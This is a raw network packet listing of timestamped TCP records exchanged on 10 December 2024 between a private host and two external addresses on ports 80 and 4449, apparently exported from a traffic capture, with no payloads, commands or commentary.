Dec 10, 2024 11:11:26.894444942 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.894712925 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.896737099 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.896833897 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.899158001 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.899230957 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.901628971 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.901652098 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.904020071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.904122114 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.906415939 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.906554937 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.908988953 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.909038067 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.909238100 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.909238100 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.911308050 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.911386967 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.913772106 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.913877010 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.914589882 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.916129112 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.916220903 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.917725086 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.918576002 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.918663979 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.918956041 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.920983076 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.921080112 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.923374891 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.923511028 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.924448967 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.925329924 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.925833941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.925973892 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.927865028 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.928245068 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.928342104 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.928950071 CET	4449	49882	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:26.930712938 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.930813074 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.933110952 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.933145046 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:26.934689999 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:26.939393044 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.035073996 CET	49890	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:27.049890041 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:27.049916029 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.052314997 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.052329063 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.053905010 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.070988894 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.171566010 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.171582937 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.171591997 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.172449112 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.190321922 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.190340996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.190377951 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.190395117 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.291024923 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291043043 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291053057 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291064024 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291085005 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291095972 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291106939 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291119099 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291131020 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291145086 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291156054 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291168928 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291179895 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291189909 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291201115 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291212082 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291223049 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291477919 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291490078 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291511059 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291522026 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291531086 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291544914 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291554928 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291565895 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291578054 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291589022 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291600943 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291611910 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291623116 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291635036 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291645050 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.291657925 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292423010 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292434931 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292445898 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292457104 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292473078 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292484999 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292495012 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292505980 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292517900 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292527914 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292540073 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292551041 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292562962 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.292573929 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293178082 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293190956 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293200970 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293212891 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293222904 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293235064 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293245077 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293303967 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293315887 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293327093 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293339014 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293349028 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293366909 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293378115 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293389082 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.293399096 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294193029 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294204950 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294214964 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294233084 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294245005 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294255018 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294265985 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294275999 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294286966 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294297934 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294308901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294318914 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294329882 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294337034 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.294342995 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295140982 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295152903 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295162916 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295175076 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295186043 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295197010 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295207977 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295219898 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295231104 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295242071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295253038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295264006 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295274973 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295300007 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295310020 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295327902 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295861006 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295875072 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.295885086 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296020031 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296034098 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296163082 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296174049 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296185017 CET	4449	49890	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:27.296202898 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296215057 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296225071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296236038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296246052 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296272039 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296282053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296292067 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296303034 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296314001 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296324968 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.296335936 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297014952 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297028065 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297039032 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297050953 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297076941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297121048 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297132015 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297141075 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297153950 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297178984 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297189951 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297199965 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297210932 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297224045 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.297235012 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.304594994 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308619976 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308650970 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308680058 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308713913 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308737040 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308768988 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308798075 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308825016 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308854103 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308887005 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308912992 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.308954954 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.309762955 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.310960054 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.408067942 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.409689903 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.423964024 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.424067020 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.424959898 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.425074100 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.427083015 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.427333117 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.428854942 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.428989887 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.430810928 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.430888891 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.432769060 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.432924986 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.434241056 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.434329033 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.435441017 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.435539007 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.436816931 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.436923981 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.438136101 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.438218117 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.439513922 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.439609051 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.440874100 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.441015959 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.442152977 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.442282915 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.443562984 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.443687916 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.444499969 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.444879055 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.444957972 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.446201086 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.446345091 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.447529078 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.447609901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.448909044 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.449040890 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.450258970 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.450346947 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.451603889 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.451719999 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.452924013 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.453047991 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.454266071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.454341888 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.455622911 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.456020117 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.456952095 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.457114935 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.458328962 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.458411932 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.459688902 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.459728956 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.459839106 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.460987091 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.461080074 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.462124109 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.462150097 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.462184906 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.462208986 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.462228060 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.462304115 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.462476969 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.463646889 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.463757992 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.465008974 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.465094090 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.466311932 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.466412067 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.467701912 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.467816114 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.469036102 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.469144106 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.470369101 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.470494032 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.471684933 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.471812963 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.473032951 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.473174095 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.474404097 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.474519014 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.475267887 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.475753069 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.475846052 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.477106094 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.477272034 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.478621006 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.478708982 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.479788065 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.479923964 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.481127024 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.481219053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.482486963 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.482610941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.483815908 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.483906984 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.485161066 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.485260963 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.486522913 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.486677885 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.487807035 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.487929106 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.489191055 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.489295006 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.490509987 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.490650892 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.491832018 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.491964102 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.493304014 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.493391991 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:27.493411064 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.494530916 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.494673967 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.495891094 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.496027946 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.497230053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.497345924 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.498578072 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.498627901 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.499897003 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.500015020 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.501224995 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.501313925 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.502634048 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.502785921 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.503988981 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.504070997 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.505264997 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.505395889 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.506619930 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.506671906 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.508002996 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.508102894 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:27.509336948 CET	80	49880	185.215.113.16	192.168.2.5
